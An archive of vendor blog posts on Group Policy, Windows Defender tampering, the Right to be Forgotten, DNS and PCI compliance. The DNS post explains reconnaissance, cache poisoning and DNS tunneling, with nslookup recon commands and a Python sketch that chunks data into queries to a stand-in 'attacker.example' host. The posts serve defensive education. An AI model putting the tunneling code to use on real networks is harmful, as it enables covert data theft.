All posts by Jeff Petters

Group Policy Editor Guide: How to Configure and Use

group policy editor

The Group Policy Editor is a Windows administration tool that allows users to configure many important settings on their computers or networks. Administrators can set password requirements, control startup programs, and define which applications or settings other users can change on their own. This blog will deal mostly with the Windows 10 version of Group Policy Editor (gpedit), but you can find it in Windows 7, 8, and Windows Server 2003 and later.

5 Ways to Access Local Group Policy Editor

There are plenty of different ways to get to the Local Group Policy Editor; pick whichever you are most comfortable with.

Open Local Group Policy Editor in Run

  • Open Search in the Toolbar and type Run, or select Run from your Start Menu.
  • Type ‘gpedit.msc’ in the Run command and click OK.

Open Local Group Policy Editor in Search

  • Open Search on the Toolbar
  • Type ‘gpedit’ and click ‘Edit Group Policy.’

Open Local Group Policy Editor in Command Prompt

  • From the Command Prompt, type ‘gpedit.msc’ and hit ‘Enter.’

Open Local Group Policy Editor in PowerShell

  • In PowerShell, type ‘gpedit’ and then ‘Enter.’

If you prefer, you can also use PowerShell to make changes to Local GPOs without the UI.

Open Local Group Policy Editor in Settings

  • Click the Windows icon on the Toolbar, and then click the gear icon to open Settings.
  • Start typing ‘group policy’ or ‘gpedit’ and click the option to ‘Edit Group Policy.’

ways to access group policy editor

Components of the Local Group Policy Editor

Now that you have gpedit up and running, there are a few important details to know about before you start making changes. Group policies are hierarchical, meaning that a higher-level group policy – like a domain level Group Policy – can override local policies.

Group policies are processed in the same order for each login: Local policies first, then Site level, then Domain, then Organizational Unit (OU). Each later level can override the earlier ones, so OU policies win over all the others.
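The processing order described above amounts to a last-writer-wins merge. Here's a minimal sketch of that behavior; the policy names and values below are hypothetical examples, not real GPO settings:

```python
# Simplified sketch of group policy processing order:
# Local -> Site -> Domain -> OU. Later levels override earlier ones,
# so an OU-level setting wins over Domain, Site, or Local settings.
# Policy names and values here are hypothetical examples.

def resolve_policies(levels):
    """Merge policy dicts in processing order; later levels win."""
    effective = {}
    for level_name, settings in levels:
        effective.update(settings)
    return effective

levels = [
    ("Local",  {"wallpaper": "personal.jpg", "min_password_len": 8}),
    ("Site",   {"min_password_len": 10}),
    ("Domain", {"usb_storage": "disabled"}),
    ("OU",     {"min_password_len": 14}),
]

effective = resolve_policies(levels)
assert effective["min_password_len"] == 14   # OU overrides Local and Site
assert effective["wallpaper"] == "personal.jpg"  # untouched by later levels
```

This is why a setting you configure locally can silently "not take": a Site, Domain, or OU policy processed later simply replaces it.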

There are two major categories of group policies – Computer and User – that are in the left pane of the gpedit window.

Computer Configuration: These policies apply to the local computer, and do not change per user.

User Configuration: These policies apply to users on the local machine, and will apply to any new users in the future, on this local computer.

Those two main categories are further broken down into sub-categories:

Software Settings: Software settings contain software-specific group policies; this category is empty by default.

group policy editor software settings

Windows Settings: Windows settings contain local security settings. You can also set logon or administrative scripts to execute changes in this category.

group policy editor window settings screenshots

Administrative Templates: Administrative templates can control how the local computer behaves in many ways. These policies can change how the Control Panel looks, what printers are accessible, what options are available in the start menu, and much more.

administrative template screenshot group policy editor

What Can You Do With Group Policy Editor?

A better question would be what can’t you do with gpedit! You can do anything from setting a desktop wallpaper to disabling services and removing Explorer from the default Start Menu. Group policies control which versions of network protocols are available and enforce password rules. A corporate IT security team benefits greatly by setting up and maintaining a strict Group Policy. Here are a few examples of good IT security group policies:

  • Disable removable devices like USB drives.
  • Disable TLS 1.0 to enforce usage of more secure protocols.
  • Limit the settings a user can change using Control Panel. Let them change screen resolution, but not the VPN settings.
  • Specify a company-sanctioned wallpaper, and turn off users’ ability to change it.
  • Keep users from accessing gpedit to change any of the above settings.

Those are just a few examples of how an IT security team could use group policies. If the IT team sets those policies at the OU or domain level, users will not be able to change them without administrator approval.

How to Configure a Security Policy Setting Using the Local Group Policy Editor Console

Once you have an idea of which GPOs you want to set, using gpedit to make the changes is pretty simple.

Let’s look at a quick password setting we can change:

  1. In gpedit, navigate to Computer Configuration, then Windows Settings, then Security Settings, then Account Policies, then Password Policy.
  2. Double-click the option for “Password must meet complexity requirements.”
  3. If you have administrative rights to change this setting, select “Enabled” and then click Apply. (ed. Varonis has a very solid IT security policy, because of course)

How to use PowerShell to Administer Group Policies

Many sysadmins are moving to PowerShell instead of the UI to manage group policies. Here are a few cmdlets from the PowerShell GroupPolicy module to get you started.

powershell group policy cmdlets

  • New-GPO: This cmdlet creates a new unassigned GPO. You can pass a name, owner, domain, and more parameters to the new GPO.
  • Get-GPOReport: This cmdlet returns all or the specified GPO(s) that exist in a domain in an XML or HTML file. Very useful for troubleshooting and documentation.
  • Get-GPResultantSetOfPolicy: This cmdlet returns the entire Resultant Set of Policy (RSoP) for a user, a computer, or both, and creates an XML file with the results. This is a great cmdlet to research issues with GPOs. You might think that a policy is set to a certain value, but that policy could be overwritten by another GPO, and the only way to figure that out is to know the actual values applied to a user or computer.
  • Invoke-GPUpdate: This cmdlet allows you to refresh the GPOs on a computer; it’s the same as running gpupdate.exe. You can schedule the update to happen at a certain time on a remote computer with the cmdlet, which also means you can write a script to push out many refreshes if the need arises.

There are many more cmdlets in the GroupPolicy PowerShell module, but these four are especially useful to track down and resolve inheritance issues with GPOs.

PowerShell is one of a hacker’s favorite tools, and one of their favorite tricks is to enable the local administrator account that you have carefully disabled to gain control of a system for more infiltration or privilege escalation work.

It’s important to monitor Active Directory for any changes made to Group Policy – often these changes are the first signals in APT attacks, where hackers intend to be in your network for a while, and they want to remain hidden. Varonis monitors and correlates current activity against normalized behavior and advanced data security threat models to detect APT attacks, malware infections, and brute-force attacks, including attempts to change GPOs.

Check out this PowerShell course by Adam Bertram for more PowerShell tips and tricks! It’s worth 3 CPE credits!

Windows Defender Turned Off by Group Policy [Solved]

hero image for windows defender post

Picture this scenario: You log into your computer on any random Thursday, and Windows Defender won’t start. You manually kick it off, and you get the message “Windows Defender is turned off by group policy.”

Could it be that you’re hacked?

Attackers know Windows Defender can detect cyberattacks, so as part of their standard playbook they attempt to disable Defender. Sometimes they could use group policy to disable Windows Defender on multiple machines – depending on their level of access – so they can move more easily between several computers on your network. Sometimes they will use a local group policy to disable Defender. There are other methods attackers use to disable Defender, but the group policy method makes it more difficult for the user to re-enable it.

5 Solutions for Windows Defender Turned Off by Group Policy

If you experience this kind of error, or one of your users reports it, you have several options to re-enable Defender. As a security practitioner, you might want to check several of these settings and a few other items (e.g., malware scans, AD event logs) for evidence of tampering.

Solution 1: Using Group Policy

  1. Open Group Policy editor
  2. Select Local Computer Policy -> Computer Configuration -> Administrative Templates -> Windows Components
    local group policy editor screenshot
  3. Select Windows Defender, and in the right panel double-click the setting “Turn off Windows Defender”
    local group policy editor illustrated screenshot
  4. “Turn off Windows Defender” will be set to Enabled if you can’t run Windows Defender. Set it to Disabled or Not Configured to turn Defender back on. You will need local administrative rights to make this change
    turn off windows defender screenshot

You should be able to run Windows Defender after you update this GPO.

Solution 2: User Settings

Another option to re-enable Windows Defender is in the Control Panel Settings.

  1. Click the Start button and type Windows Defender, and double click the icon for Windows Defender Security Center – this might be slightly different depending on your version of Windows.
  2. Click Settings and look for the toggle labeled “Real-time protection.” Make sure it is on.
    user settings screenshot

Solution 3: Using the Command Line

Another solution is to run the following command from PowerShell – make sure to Run As Administrator.

Set-MpPreference -DisableRealtimeMonitoring $false

Solution 4: Using the Registry Editor

Editing the Registry is another possible fix for this issue.

  1. Run ‘regedit’
  2. Navigate through the tree to “HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender.”
  3. Delete DisableAntiSpyware in the right pane.
  4. Navigate to “HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection.”
  5. Delete DisableRealtimeMonitoring in the right pane.

People report that sometimes the first one works, sometimes the second, sometimes both. Best to delete both to be sure.

Solution 5: Reviewing Conflicting Programs

It is possible that attackers turned off Windows Defender by some other means and not from direct tampering with computer settings. You may have to investigate further to get everything back up and running.

Check for Malware

Malware can turn off Defender and keep it off despite your best efforts to re-enable it. If you aren’t able to turn Defender back on you might be infected. Install and run another malware detector of your choice and see if you can find and remove the infection.

Another option is to do what Varonis ITSec does and reinstall the OS.

Check Third-Party Antivirus Tools

If none of the other solutions work and you have another antivirus application installed, make sure it is compatible with Windows Defender. Some antivirus programs aren’t; some EDR solutions are.

Windows Defender is a good line of defense in a layered security strategy, but it is relatively easy for attackers to work around. Just as easily as you can turn it on, they can turn it back off.

solutions for windows defender turned off by group policy

Varonis provides monitoring, perimeter telemetry, and advanced data security analytics for detecting intrusions and attackers even when they attempt to hide by turning off Windows Defender. Varonis monitors changes to GPOs and will throw an alert anytime someone changes a GPO. Varonis also detects attackers that connect from new network connections in strange geolocations and attempt to steal or escalate privileges.

Want to see how Varonis protects you from attack? Sign up for a free Live Cyber Attack Workshop right now!

Right to be Forgotten: Explained

right to be forgotten hero

The “Right to be Forgotten” (RTBF) is a key element of the new EU General Data Protection Regulation (GDPR), but the concept pre-dates the latest legislation by at least five years. It encompasses consumers’ rights to request that all personal data held by a company — or “controller” in GDPR-speak — be removed on request. But it goes further: the GDPR rules (see its Article 17) say that search engines (like Google) have to delete references to personal data that comes up publicly in search results.

In other words, consumers have the right to retain their privacy on the Internet. The notion of RTBF is becoming more common all around the world. California recently passed RTBF provisions in the California Consumer Privacy Act, North Carolina is working on RTBF laws, and there are early efforts to bring the issue before the US Congress.

All that to say: RTBF looks to be a new “normal” in the coming years.

Editor’s note: The Right to be Forgotten, Right to Erasure, and Right to Delete are conceptually similar enough that we are going to simply call them all Right to be Forgotten for this blog.

Right to Be Forgotten History

The RTBF as a concept grew out of the long held belief that after a certain amount of time, a person’s past should not be regarded when they seek employment. With the advent of the internet and indexed search engines (like Google), those types of records became more accessible.

Time for a quick history lesson: In 2014, the Court of Justice of the European Union ruled in favor of a right to be forgotten in Google Spain SL, Google Inc v Agencia Española de Protección de Datos, Mario Costeja González (2014), a case referred by the Spanish courts. The case revolved around a 1998 newspaper announcement in La Vanguardia for Costeja’s forced property sale, required to settle social security debts. In 2009, Costeja contacted the newspaper because searching for his name brought up the old announcement. The newspaper denied the request since it was a government-ordered publication. Costeja then contacted Google Spain to remove the search result.

Eventually, the EU courts ruled that Google needed to remove the search results, but – and this is important – the newspaper didn’t have to remove the original article. The ruling effectively established precedent and validated RTBF as law, with several caveats.

Today, RTBF is enshrined in the GDPR’s Article 17. And the RTBF has reached US shores as the Right to Erasure, which is now law in California.

Can I Ask a Company to Delete My Data?

In general, if you are in a jurisdiction where RTBF or similar laws exist, you can submit a Data Subject Access Request (DSAR) to ask what personal data a company has stored about you, or to request its removal. That doesn’t mean the data controller will or should fulfill every DSAR. There are legal differences between public, private, and erroneous data to consider.

When is the Right to Be Forgotten Applicable?

First, you need to make the request directly with the data collector that holds the data that you want deleted. Google has a specific request form for this, Facebook another, and so on.

The “data controller,” the entity that currently has the data you want removed, must then consider your request based on legal precedents. Some valid reasons for an RTBF request include:

  1. Data exists on the internet that is old, outdated, or otherwise no longer relevant
  2. The data subject decides that the data controller no longer has the right to access their data, and the data isn’t in the public domain
  3. Someone stole the data or changed the data
  4. A judge or other judicial body ruled that the data must be deleted

reasons for a right to be forgotten request

In short, the “data subject” – the person making the request – has a strong legal framework to demand that data controllers must erase their personal data in many instances. For example, blatantly false or abusive data has a good case for erasure. There are, of course, exceptions.

Are There Exceptions to the Right to Be Forgotten?

There are several exceptions to RTBF:

  1. The data should be available because of freedom of information or expression.
  2. The data is part of an active or recent legal proceeding.
  3. The data is of importance to public health.
  4. The data should be archived for public interest because it is significant to scientific or historical research.

For the most part, exceptions to the RTBF revolve around public interest, freedom of speech, and freedom of information.

Controversy Regarding the Right to Be Forgotten

Not surprisingly, RTBF is controversial with compelling arguments on both sides of the issue. On one hand, you have an individual’s right to privacy, and on the other, you have freedom of speech and freedom of information.

The controversy boils down to where does one draw the line between the two? In the previously mentioned Costeja case, that line was the search result. The factual information that Costeja sold the property to settle debt is a matter of public record, and should not be deleted from the internet. However, the courts ordered Google to delete and suppress the search result that linked to the public information that Costeja sold the property. The ruling says that since Costeja repaid the debt  long ago, the search results are “inadequate, irrelevant, or excessive.” The court granted Costeja RTBF based on those grounds but stopped short of saying any data deletion request must be granted.

Recently, France brought a case to the European Court of Justice requesting that the GDPR’s RTBF extend universally to people outside the EU. Critics, including Google, argue that a ruling extending RTBF might result in global censorship and infringe freedom of information rights.

On the other side, France argues that if RTBF isn’t universal, then the Google search result will still show up in other countries – rendering the protection of RTBF effectively useless. If Google only deletes the result in Europe, anyone could just use the U.S. version of Google to see the same result.

The question of where to draw that line between Right to Privacy and Freedom of Information is not going away. Stay tuned as lawmakers, lawyers, and judges make new rules and verdicts – it’s a fascinating discussion.

Right to Be Forgotten in The News

The Recent News is All About Google v France

Canada’s Privacy Commissioner Asked the Courts to Rule on Right to be Forgotten

A UK Charity Asks Courts to Grant RTBF to Childhood Cancer Survivors

The Right to be Forgotten is going to prove to be a tricky rule for organizations to navigate as guidelines develop and evolve. Each organization needs a strategy in place to manage RTBF requests based on the data it saves and the applicable RTBF laws.

how to manage an RTBF request

Companies need a documented process for finding, verifying, and deleting a data subject’s personal data on request.

Varonis DatAnswers creates an index of your data and helps identify files that contain data subject identifiers, enabling companies to process each DSAR appropriately. Unstructured data can expose a data controller to millions of dollars in potential fines if it mishandles a DSAR and the customer’s data gets shared or reused again. The Varonis Data Transport Engine can then help move, collect, and secure all of those files in one single location, so that you can easily quarantine or delete the data – and more easily comply with RTBF.

Want to talk to one of our GDPR experts about how Varonis helps you manage DSARs and Right to be Forgotten? Get a free 1:1 demo and ask about GDPR.

What is DNS, How it Works + Vulnerabilities

DNS domain name system

The Domain Name System (DNS) is the internet’s version of the Yellow Pages. Back in the olden times, when you needed to find a business’ address, you looked it up in the Yellow Pages. DNS is just like that, except you don’t actually have to look anything up: your internet-connected computer does that for you. It’s how your computer knows how to find Google or any other site by name.

For two computers to communicate on an IP network, protocol dictates that they need an IP address. Think of an IP address like a street address: for one computer to “locate” another, it needs to know the other computer’s number. Since most humans are better at remembering names than long strings of numbers, they needed a program for computers to translate names into IP addresses.

The program to translate names into numbers and vice versa is called “DNS,” or Domain Name System, and computers that run DNS are called “DNS servers.” Without DNS, we’d have to remember the IP address of any server we wanted to connect to – no fun.

How DNS Works

DNS is such an integral part of the internet that it’s important to understand how it works.

Think of DNS like a phone book, but instead of mapping people’s names to their street address, the phone book maps computer names to IP addresses. Each mapping is called a “DNS record.”

The internet has a lot of computers, so it doesn’t make sense to put all the records in one big book. Instead, DNS is organized into smaller books, or domains. Domains can be very large, so they are further organized into smaller books, called “zones.” No single DNS server stores all the books – that would be impractical.

Instead, there are lots of DNS servers that store all the DNS records for the internet. Any computer that wants to know a number or a name can ask its DNS server, and its DNS server knows how to ask – or query – other DNS servers when it needs a record. When a DNS server queries other DNS servers, it’s making an “upstream” query. Queries for a domain can go “upstream” until they lead back to the domain’s authority, or “authoritative name server.”

An authoritative name server is where administrators manage server names and IP addresses for their domains. Whenever a DNS administrator wants to add, change or delete a server name or an IP address, they make a change on their authoritative DNS server (sometimes called a “master DNS server”). There are also “slave” DNS servers; these DNS servers hold copies of the DNS records for their zones and domains.

how DNS works

The Four DNS Servers that Load a Webpage

  • DNS recursor: The DNS recursor is the server that receives your DNS query and either answers from its cache or asks other DNS servers for the address.
  • Root name server: A root name server is the name server for the root zone. It responds to direct requests and can return a list of authoritative name servers for the corresponding top-level domain.
  • TLD name server: The top-level domain (TLD) server is one of the high-level DNS servers on the internet. When you search for varonis.com, a TLD server for ‘.com’ responds first, then DNS searches for ‘varonis.’
  • Authoritative name server: The authoritative name server is the final stop for a DNS query. The authoritative name server holds the DNS record for the request.

Types of DNS Service

There are two distinct types of DNS services on the internet. Each of these services handles DNS queries differently depending on their function.

  • Recursive DNS resolver: A recursive DNS resolver is the DNS server that responds to the DNS query and looks for the authoritative name server or a cached DNS result for the requested name.
  • Authoritative DNS server: An authoritative DNS server stores the DNS records for its domains and zones. So if you ask an authoritative DNS server for one of its IP addresses, it doesn’t have to ask anyone else. The authoritative name server is the final authority on those names and IP addresses.

Public DNS and Private DNS

DNS was created so people could connect to services on the internet.  For a server to be accessible on the public internet, it needs a public DNS record, and its IP address needs to be reachable on the internet – that means it’s not blocked by a firewall. Public DNS servers are accessible to anyone that can connect to them and don’t require authentication.

Interestingly, not all DNS records are public. Today, in addition to allowing employees to use DNS to find things on the internet, organizations use DNS so their employees can find private, internal servers. When an organization wants to keep server names and IP addresses private, or not directly reachable from the internet, they don’t list them in public DNS servers. Instead, organizations list them in private, or internal DNS servers – internal DNS servers store names and IP addresses for internal file servers, mail servers, domain controllers, database servers, application servers, etc. – all the important stuff.

Something to remember – like external DNS servers, internal DNS servers don’t require authentication. That’s because DNS was created long ago, when security wasn’t such a big concern. Most of the time, anyone on the inside of the firewall – by infiltration or connected through a VPN – can query internal DNS servers. The only thing that prevents someone “outside” from accessing and querying internal DNS servers is that they can’t connect to them directly.

  • Public DNS: For a server to be accessible on the public internet, it needs a public DNS record, and its IP address needs to be reachable on the internet.
  • Private DNS: Computers that live behind a firewall or on an internal network use a private DNS record so that local computers can identify them by name. Outside users on the internet will not have direct access to those computers.

7 Steps in a DNS Lookup

Let’s look at exactly how a DNS request works.

  1. A DNS request starts when you try to access a computer on the internet. For example, you type www.varonis.com in your browser address bar.
  2. The first stop for the DNS request is the local DNS cache. As you access different computers, those IP addresses get stored in a local repository. If you have visited www.varonis.com before, you have the IP address in your cache.
  3. If you don’t have the IP address in your local DNS cache, DNS will check with a recursive DNS server. Your IT team or Internet Service Provider (ISP) usually provides a recursive DNS server for this purpose.
  4. The recursive DNS server has its own cache, and if it has the IP address, it will return it to you. If not, it will ask another DNS server.
  5. The next stop is the TLD name servers – in this case, the TLD name server for .com addresses. These servers don’t have the IP address we need, but they can send the DNS request in the right direction.
  6. What the TLD name servers do have is the location of the authoritative name server for the requested site. The authoritative name server responds with the IP address for www.varonis.com, and the recursive DNS server stores it in the local DNS cache and returns the address to your computer.
  7. Your local DNS service gets the IP address and connects to www.varonis.com to download all the glorious content. DNS then records the IP address in the local cache with a time-to-live (TTL) value. The TTL is the amount of time the local DNS record is valid; after that time, DNS will go through the process again the next time you request the site.
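The steps above can be sketched as a toy resolver. This is purely illustrative: the names, addresses, and server tables are made-up stand-ins (RFC 5737 documentation IPs), and a real resolver speaks the DNS wire protocol rather than reading Python dictionaries:

```python
# Toy model of the DNS lookup chain: local cache -> recursive resolver
# -> TLD name server -> authoritative name server. All names, addresses,
# and server tables below are hypothetical examples.

TLD_SERVERS = {"com": "ns.tld-registry.example"}   # TLD knows the authority
AUTHORITATIVE_RECORDS = {"www.example.com": ""}

local_cache = {}

def lookup(name):
    # Step 2: check the local DNS cache first.
    if name in local_cache:
        return local_cache[name], "local cache"
    # Steps 3-5: the recursive resolver asks the TLD server for the
    # requested name's top-level domain ("com" here).
    tld = name.rsplit(".", 1)[-1]
    assert tld in TLD_SERVERS  # the TLD server points at the authority
    # Step 6: the authoritative name server holds the actual record.
    ip = AUTHORITATIVE_RECORDS[name]
    # Step 7: cache the answer so the next request is instant.
    local_cache[name] = ip
    return ip, "authoritative"

ip, source = lookup("www.example.com")    # first lookup walks the chain
ip2, source2 = lookup("www.example.com")  # second lookup hits the cache
```

The second lookup never leaves the machine, which is exactly why caching matters so much for DNS performance.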

What are Types of DNS Queries?

A DNS query carries a code that tells the DNS server what kind of query it is and what information the requester wants back. There are three basic DNS queries in a standard DNS lookup.

  • Recursive query: In a recursive query, the computer requests the full answer: either the IP address or confirmation that the DNS server couldn’t find it.
  • Iterative query: In an iterative query, the requester asks a DNS server for the best answer it has. If the DNS server doesn’t have the IP address, it will return a referral to the authoritative name server or TLD name server. The requester continues this iterative process until it finds an answer or times out.
  • Non-recursive query: A query the DNS resolver can answer immediately, either because it is authoritative for the record or because the record is already in its cache. No further requests are needed, which limits network bandwidth usage.

types of DNS queries

What is DNS Cache + Caching Functions

DNS cache is a repository of domain names and IP addresses stored on a computer, so it doesn’t have to ask for the IP address every time. Imagine if, every time any user tried to go to varonis.com, DNS had to query the authoritative name server at Varonis. The traffic would be overwhelming! The very thought of that much traffic is why we have DNS caching. DNS caching has two major goals:

  • Speed up DNS requests
  • Reduce bandwidth of DNS requests across the internet

The DNS cache methodology does have some issues, however:

  • DNS changes need time to propagate – meaning it could be a while before every DNS server has its cache updated with the latest IP data
  • DNS cache is a potential attack vector for hackers

There are a few different types of DNS caching used on the internet:

  • Browser DNS caching: Current browsers circa 2018 have built-in DNS caching functionality. Resolving a name from the local cache is fast and efficient.
  • Operating System (OS) DNS caching: Your computer is a DNS client, and a service on your computer manages DNS resolution and requests. This DNS cache is also local, and therefore fast, and requires no bandwidth.
  • Recursive resolving DNS caching: Each DNS recursor has a DNS cache, and it stores any IP address that it knows for use in the next request
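The TTL behavior that governs all three cache layers can be sketched in a few lines. This is a minimal illustration with hypothetical names and addresses; real caches also handle negative answers, eviction limits, and more:

```python
import time

# Minimal sketch of a TTL-based DNS cache: a record is only valid until
# its time-to-live expires; after that the resolver must re-resolve.
# The names and addresses here are hypothetical examples.

class DnsCache:
    def __init__(self):
        self._records = {}  # name -> (ip, expires_at)

    def put(self, name, ip, ttl, now=None):
        now = time.time() if now is None else now
        self._records[name] = (ip, now + ttl)

    def get(self, name, now=None):
        now = time.time() if now is None else now
        entry = self._records.get(name)
        if entry is None:
            return None      # never cached: a full lookup is needed
        ip, expires_at = entry
        if now >= expires_at:
            del self._records[name]
            return None      # TTL expired: must re-resolve
        return ip

cache = DnsCache()
cache.put("www.example.com", "", ttl=300, now=1000.0)
assert cache.get("www.example.com", now=1100.0) == ""  # fresh
assert cache.get("www.example.com", now=1400.0) is None           # expired
```

The trade-off is visible right in the code: a long TTL means fewer lookups but slower propagation of changes; a short TTL means fresher data but more traffic.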

DNS Weaknesses and Vulnerabilities

There are three major vulnerabilities with DNS to watch out for, which attackers often exploit to abuse DNS:

  1. Internal DNS servers hold all the server names and IP addresses for their domains and will share them with anyone that asks. This makes DNS a great source of information for attackers when they’re trying to do internal reconnaissance.
  2. DNS caches aren’t “authoritative,” and they can be manipulated. If your DNS server is “poisoned” with bad records, computers can be fooled into going to bad places.
  3. DNS relays query information from internal workstations to outside servers, and attackers have learned how to use this behavior to create “covert channels” to exfiltrate data.

DNS weaknesses and vulnerabilites

Use DNS for Reconnaissance

Once an attacker is inside a firewall and has control of a computer, they can use DNS to find important server names. Attackers can look up names that are associated with internal IP addresses – mail servers, name servers – all sorts of valuable stuff. If they’re savvy enough, they can even get an internal DNS server to send over lots of information about its domain’s zones – this is called a “DNS zone transfer attack.”

If you have a Windows computer, run the following commands as-is; if you are a Linux user, there are corresponding commands you can look up.

  1. Open up a command prompt (press Ctrl + Esc, type “cmd,” then press Enter).
  2. Type ipconfig
  3. You’ll see the DNS domain you’re in (Connection-specific DNS Suffix), your IP address, and a bunch of other stuff. You will want to refer back to this.
  4. Type nslookup [ip address]. You’ll see the name of the DNS server that’s responding and, if the name is known, the DNS record listing the name and IP address.
  5. Type nslookup -type=soa [your domain]. This command returns your authoritative DNS server – wouldn’t that be handy if you were trying to infiltrate a network?
  6. Type nslookup -type=MX [your domain]. That command returns all of the mail servers on your local domain, just in case you wanted to hack mail servers and didn’t know where they were.

Use DNS to Redirect Traffic

Remember, when a user tries to browse to a website, their computer queries its DNS server for the IP address of the site, or DNS record. If the DNS server has a cached copy of the record, it replies. If not, it queries an “upstream” DNS server, relays the results back to the end user, and caches them for next time.

Attackers have figured out ways to spoof DNS responses or make responses look like they’re coming from legitimate DNS servers. Without getting overly technical, attackers take advantage of three weaknesses in DNS to do this:

  1. DNS performs very weak validation on responses coming from upstream servers. Responses just need to contain the right transaction ID, which is just a 16-bit number (0-65536). Just as it turns out that you don’t need that many people in a room for the odds to favor two of them having the same birthday, it turns out that it’s easier to guess the right ID than you might think.
  2. DNS servers accept simultaneous (or near-simultaneous) responses to their requests, allowing attackers to make multiple guesses about the transaction ID (which is a little like a brute-force attack against a password).
  3. The IP connections used by DNS are easy to “spoof.” That means an attacker can send traffic to a DNS server from one computer and make it look like it’s coming from another computer, like a valid DNS server. Only certain kinds of IP connections are easy to spoof – DNS happens to be one of them.
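To see why a 16-bit transaction ID is weak, you can work out the odds directly. The sketch below is plain probability, no network code; it computes the chance that at least one of a burst of spoofed responses guesses the right ID:

```python
def spoof_success_probability(guesses, id_space=2**16):
    """P(at least one of `guesses` random IDs matches the real transaction ID)."""
    miss = (1 - 1 / id_space) ** guesses  # probability every guess misses
    return 1 - miss

# A burst of spoofed responses per query adds up fast across many queries:
print(round(spoof_success_probability(100), 4))    # 0.0015 per query
print(round(spoof_success_probability(65536), 2))  # 0.63 with 65,536 guesses
```

Attackers don’t need a sure thing on any single query – they just trigger many queries and spoof many responses until one lands.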

If an attacker successfully spoofs a DNS response, they can make the receiving DNS server cache a poisoned record. So how does that help the attackers?

Here’s an example: Let’s say an attacker learns that your organization uses an external application for something important, like expenses. If they poison your organization’s DNS server so that it sends each user to the attacker’s server, all they need to do is create a legitimate looking login page, and users will enter their credentials. They might even relay the traffic to the real server (acting as a “man in the middle”), so no one notices. The attacker can then try those credentials on other systems, sell them or just celebrate with an evil laugh.

Use DNS as a Covert Channel

Let’s say an attacker has managed to get inside a network, compromised a host or two, and found critical data that they want to exfiltrate. How can they do that without setting off any alarms? Attackers use a technique called “DNS tunneling” to do just that. They register a DNS domain on the internet and create an authoritative name server for it. Then, on the compromised host, the attacker can use a program that breaks up the data into small chunks and inserts it into a series of lookups, like so:

  • nslookup
  • nslookup
  • nslookup

The DNS server will receive these requests, realize the results aren’t in its cache, and relay those requests back to the attacker’s authoritative name server. The attacker is expecting this traffic, so it runs a program on the authoritative name server to extract the first part of each query (everything before the attacker’s domain name) and reassemble the data. Unless the organization is inspecting the queries its DNS servers make, they may never realize their DNS servers were used to exfiltrate data.
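The chunking step can be sketched like this. The domain name (`attacker.example`) and label size are hypothetical, and this toy uses hex encoding to keep the payload DNS-safe (labels max out at 63 characters); a real tunneling tool would also handle sequencing, encryption, and the server side:

```python
def chunk_for_dns(data: bytes, domain="attacker.example", label_len=60):
    """Split data into hex chunks and build one DNS query name per chunk."""
    hexed = data.hex()
    labels = [hexed[i:i + label_len] for i in range(0, len(hexed), label_len)]
    # Each query looks like "<chunk>.<attacker domain>"
    return [f"{label}.{domain}" for label in labels]

def reassemble(queries, domain="attacker.example"):
    """Server side: strip the domain suffix, concatenate the chunks, decode."""
    hexed = "".join(q[:-(len(domain) + 1)] for q in queries)
    return bytes.fromhex(hexed)
```

The resulting names would be issued as ordinary lookups (e.g. `nslookup <chunk>.attacker.example`), which is why tunneled traffic blends in with normal DNS activity.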

DNS has been around for a long time, and every computer connected to the internet relies on it. Attackers now use DNS for both external and internal reconnaissance, to hijack traffic and to create covert communication channels. Luckily, by monitoring DNS servers and applying security analytics, many of these attacks can be detected and thwarted.

Want to see how? Join our Live Cyber Attack Workshops and watch our security engineers execute a live attack – and exfiltrate data via DNS tunneling – all in real time!

What is PCI Compliance: Requirements and Penalties

PCI compliance

PCI compliance is a set of standards and guidelines for companies to manage and secure credit card related personal data. The major credit card companies – Visa, Mastercard, and American Express, among others – established the Payment Card Industry Data Security Standard (PCI DSS) in 2006 in an effort to protect credit card data from theft.

Experts say credit card fraud costs businesses billions of dollars each year in the United States. It should be obvious that cybercriminals are currently winning the war on credit cards. Protecting customer data and payment information needs to be a priority for consumers, businesses, and banks so we can stop wasting billions of dollars on credit card fraud. Understanding and leveling-up your PCI compliance capability is a major part of winning the war.

Why is PCI Compliance Important for Businesses to Follow?

PCI DSS compliance should be one of the most important ongoing projects in any business that stores customers’ private credit card data. According to the 2018 Verizon Payment Security Report, only 52.5% of all organizations are 100% PCI compliant, and just 39.7% of companies in the Americas. We can do better!

Verizon’s research shows a correlation between companies that experienced a data breach and missing PCI DSS controls. In short: breached companies didn’t follow all of the requirements, which shocks no one.

More importantly, following the PCI DSS helps you keep compliant with data security and privacy laws, such as the General Data Protection Regulation (GDPR) or the Gramm-Leach-Bliley Act (GLBA). PCI DSS represents good data security practices for any organization to follow.

How Do You Become PCI Compliant?

PCI DSS is the roadmap you need to follow to become PCI compliant: 12 requirements, grouped into six goals, for protecting customer data.

goals of PCI DSS compliance

12 PCI DSS Requirements

  • Build and Maintain a Secure Network and Systems
    • Requirement 1: Install and maintain a firewall configuration to protect cardholder data
    • Requirement 2: Do not use vendor-supplied defaults for system passwords and other security parameters
  • Protect Cardholder Data
    • Requirement 3: Protect stored cardholder data
    • Requirement 4: Encrypt transmission of cardholder data across open, public networks
  • Maintain a Vulnerability Management Program
    • Requirement 5: Protect all systems against malware and regularly update anti-virus software or programs
    • Requirement 6: Develop and maintain secure systems and applications
  • Implement Strong Access Control Measures
    • Requirement 7: Restrict access to cardholder data by business need to know
    • Requirement 8: Identify and authenticate access to system components
    • Requirement 9: Restrict physical access to cardholder data
  • Regularly Monitor and Test Networks
    • Requirement 10: Track and monitor all access to network resources and cardholder data
    • Requirement 11: Regularly test security systems and processes
  • Maintain an Information Security Policy
    • Requirement 12: Maintain a policy that addresses information security for all personnel

How Much Does It Cost To Get PCI Compliant?

The answer to this question is complicated.

The cost of PCI compliance is a pittance compared to the cost of a data breach.

PCI compliance is simply good data security practice and isn’t much different from the NIST or SANS security controls. Think of the cost of PCI compliance more like the “cost of good data security practices” and then make your calculations accordingly.

How Do I Validate My PCI Compliance?

Each credit card company has its own compliance validation levels that merchants need to adhere to. You can either perform your own PCI Compliance Self-Assessment Questionnaire (SAQ), or you can contract with a certified PCI Qualified Security Assessor (QSA).

PCI Compliance Qualified Security Assessors (QSA)

PCI QSAs are certified and trained to perform PCI security assessments. Different QSAs will be more familiar with one business or another, so if you do go this route make sure to find one that understands your business needs.

PCI Compliance Self-Assessment Questionnaire (SAQ)

